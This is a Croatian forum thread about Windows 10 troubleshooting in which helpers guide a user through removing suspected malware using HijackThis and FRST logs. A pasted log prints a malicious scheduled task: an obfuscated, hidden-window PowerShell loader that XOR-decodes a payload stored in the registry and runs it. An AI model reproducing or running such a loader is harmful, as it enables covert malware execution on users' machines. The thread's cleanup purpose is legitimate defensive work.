PC Ekspert Forum
Stranica 44 od 44 « Prva 3440414243 44
Show 40 post(s) from this thread on one page

PC Ekspert Forum (http://forum.pcekspert.com/index.php)
-   Operativni sustavi (http://forum.pcekspert.com/forumdisplay.php?f=36)
-   -   Windows 10 - problemi, troubleshooting (http://forum.pcekspert.com/showthread.php?t=272277)

domy_os 23.07.2023. 21:45
Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj:

Code:
try {
        if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
        if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# i na kraju

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted

fre@k 24.07.2023. 01:18
Citiraj:
Autor domy_os (Post 3687397)
Rekao bih da je neki malware u pitanju jer mi taj PowerShell task nije legit, stavi HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

Preventivno isključi pokretanje skripti, pokreni PowerShell kao admin pa pasteaj:

Code:
try {
        if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
        if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# i na kraju

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted
Ukucao ovo u powershell i vratio mi je false

Citiraj:
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:16:50, on 24.7.2023.
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.19041.1566)


Boot mode: Normal

Running processes:
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Users\Boris\Desktop\HijackThis.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{d7fde4bf-e111-4e9b-a6c9-d207412f0933}: NameServer = 213.191.128.8,213.191.128.9
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Inc. - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Genuine Software Monitor Service (AGMService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service: eID DCS (AkdEidDcs) - Unknown owner - C:\Program Files\AKD\eID Middleware\Dcs.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: AMD Crash Defender Service - Unknown owner - C:\WINDOWS\System32\amdfendrsr.exe (file missing)
O23 - Service: AMD External Events Utility - AMD - C:\WINDOWS\System32\DriverStore\FileRepository\u0379219.inf_amd64_3649648678001de4\B378972\atiesrxx.exe
O23 - Service: AnyDesk Service (AnyDesk) - AnyDesk Software GmbH - C:\Program Files (x86)\AnyDesk\AnyDesk.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.00.42\atkexComSvc.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_63b49 - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: Dropbox Update Service (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox Update Service (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: DbxSvc - Unknown owner - C:\WINDOWS\system32\DbxSvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: EG Station Information Service - Unknown owner - C:\Esko\bg_prog_egsis_v010\bin_ix86\egsissrv.exe
O23 - Service: Esko Subscription Service - Esko BVBA - C:\Program Files (x86)\Common Files\Esko\SubscriptionService\SubscriptionService\SubscriptionService.exe
O23 - Service: Everything - voidtools - C:\Program Files\Everything\Everything.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FLEXlm License Manager - Flexera - C:\Esko\bg_prog_system_v010\bin_ix86\lmgrd.exe
O23 - Service: FlexNet Licensing Service - Flexera - C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
O23 - Service: FlexNet Licensing Service 64 - Flexera - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Google Chrome Elevation Service (GoogleChromeElevationService) (GoogleChromeElevationService) - Google LLC - C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.199\elevation_service.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) PROSet Monitoring Service - Unknown owner - C:\Windows\system32\IProsetMonitor.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @oem127.inf,%SERVICE_FRIENDLY_NAME%;Nahimic service (NahimicService) - Unknown owner - C:\WINDOWS\system32\NahimicService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: Corel License Validation Service V2, Powered by arvato (PSI_SVC_2) - arvato digital services llc - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: Realtek Audio Universal Service (RtkAudioUniversalService) - Unknown owner - C:\WINDOWS\System32\RtkAudUService64.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Samsung UPD Utility Service (SamsungUPDUtilSvc) - Unknown owner - C:\Windows\SysWOW64\SecUPDUtilSvc.exe
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\WINDOWS\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\SgrmBroker.exe,-100 (SgrmBroker) - Unknown owner - C:\WINDOWS\system32\SgrmBroker.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\WINDOWS\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: @oem126.inf,%ss_conn_launcher.SvcDesc%;SAMSUNG Mobile USB Connectivity Launcher (ss_conn_launcher_service) - Unknown owner - C:\WINDOWS\System32\Samsung\EasySetup\ss_conn_launcher.exe (file missing)
O23 - Service: SAMSUNG Mobile Connectivity Service (ss_conn_service) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
O23 - Service: SAMSUNG Mobile Connectivity Service V2 (ss_conn_service2) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\28_ssconn2\conn\ss_conn_service2.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: Adobe SwitchBoard (SwitchBoard) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: VirtualBox system service (VBoxSDS) - Oracle Corporation - C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wacom Professional Service (WTabletServicePro) - Wacom Co. Ltd. - C:\Program Files\Tablet\Wacom\WTabletServicePro.exe

--
End of file - 10226 bytes

domy_os 25.07.2023. 20:02
Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
U HJT logu ne vidim nešto sumnjivo, ali stavi logove i od FRST-a...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.

pogi 30.07.2023. 09:12
Što znače zelene kvačice na ikonama na desktopu?

https://i.ibb.co/vYf7xrR/kvacice-PCE.jpg

xlr 30.07.2023. 09:21
Fajlovi/šortkati su syncani s Onedrive-om (ili nekim drugim cloudom/NAS-on - Dropbox, Synology...).

fre@k 05.08.2023. 22:40
Citiraj:
Autor domy_os (Post 3687787)
Ima li kakvih promjena? Ovime možeš skroz disableati script host...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
U HJT logu ne vidim nešto sumnjivo, ali stavi logove i od FRST-a...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Spremi ga na desktop, zatvori sve aplikacije, pokreni FRST kao admin i uploadaj FRST.txt i Addition.txt.

Citiraj:
==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
Znaci sve sam izguglao ali neznam uz cega je ovo vezano

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN

domy_os 05.08.2023. 23:26
Ja bih ovo maknuo:

Code:
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
 
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
A ovo disableao pa enableaj ako bude problema sa zvukom:

Code:
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)

Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)

geronimo_2 05.08.2023. 23:34
Decki eset poceo blokat link na ovu temu. Javlja neki trojan. Pretpostavljam da je do svih ovih kodova gore pa se blesira :stoopid:

spiderhr 10.01.2024. 09:38
Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.

kopija 10.01.2024. 10:08
Citiraj:
Autor spiderhr (Post 3721200)
Jooj kako me živcira kaj ne mogu otvoriti drugi File explorer kada ga jednom otvorim nego moram ctrl+n. Ima kakav hack da se to zaobiđe? Baš su sranje napravili.

A kako bi ga ti htio otvoriti?

Snagom misli?

spiderhr 10.01.2024. 10:09
Citiraj:
Autor kopija (Post 3721204)
A kako bi ga ti htio otvoriti?

Snagom misli?
Kak je bilo prije. Ikona u taskbaru otvorio se pa si na istu ikonu mogao otvoriti drugi, treći...

Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način.

udarnik60 10.01.2024. 10:13
Citiraj:
Autor spiderhr (Post 3721205)
Kak je bilo prije. Ikona u taskbaru otvorio se pa si na istu ikonu mogao otvoriti drugi, treći...



Inače mogućnost grupiranja prvo maknem jer mi se ne sviđa taj način.
Tipka za win + e ti ne otvara novi? Ili mišem middle click na ikonu u taskbaru?

Sent from my motorola edge 40 using Tapatalk

spiderhr 10.01.2024. 10:40
Meh... previše klikova plus kaj moram micati ruku s miša. Ovo sa win + e otvara.

Ma samo sam htio da ako već imam shortcutove u tasbaru da ih mogu višestruko otvoriti mišem. Jbg, razmazio me Linux a i do W7 je bilo sve normalno dok nisu počeli bijesne gliste izvoditi sa sučeljem kao to je bolje.

Edit: malo gunđam na Win. Bolje na Win nego na kolegice i kolege.

mkey 11.01.2024. 20:09
Middle click na ikonu na taskbaru bi morao otvoriti još jedan prozor, koja god aplikacija da je u pitanju (samo da dopušta više instanci).

Neo-ST 11.02.2024. 14:19
Ekipa, iz čista mira mi se pojavio "user1" na Windowsima.
Znači sinoć sve bilo normalno, ugasim komp, odem leć, danas ga upalim i dočeka me onaj login izbornik da odaberem s kojim userom ću se logirati u Win, moj defaultni ili taj user1.
Ako kliknem na user1, pita me password. Wtf.

Uđem u svoj i u settingsima pod users vidim ovo:

https://i.postimg.cc/64pbkKxL/Image-007.png

Da li je moguće da je neki win update napravio tog usera?

EDIT:
Morao ući u safe mode, cmd run as admin, "net user user1 /del" da bi izbrisao taj account.
Nakon toga normalni boot u win, pa opet run netplwiz, i maknit kvačicu sa "users must enter username and password to log in to this computer", jer me bez toga svejedno zaustavljao na login screenu nakon boota.

Bravo Microsoft, bravo.

mkey 12.02.2024. 18:39
Malo je sumnjivo da su windowsi napravili taj account.

domy_os 12.02.2024. 20:05
https://www.ultimatewindowssecurity....x?eventid=4720


Sva vremena su GMT +2. Sada je 09:09.
Stranica 44 od 44 « Prva 3440414243 44
Show 40 post(s) from this thread on one page

Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© 1999-2023 PC Ekspert - Sva prava pridržana ISSN 1334-2940
Ad Management by RedTyger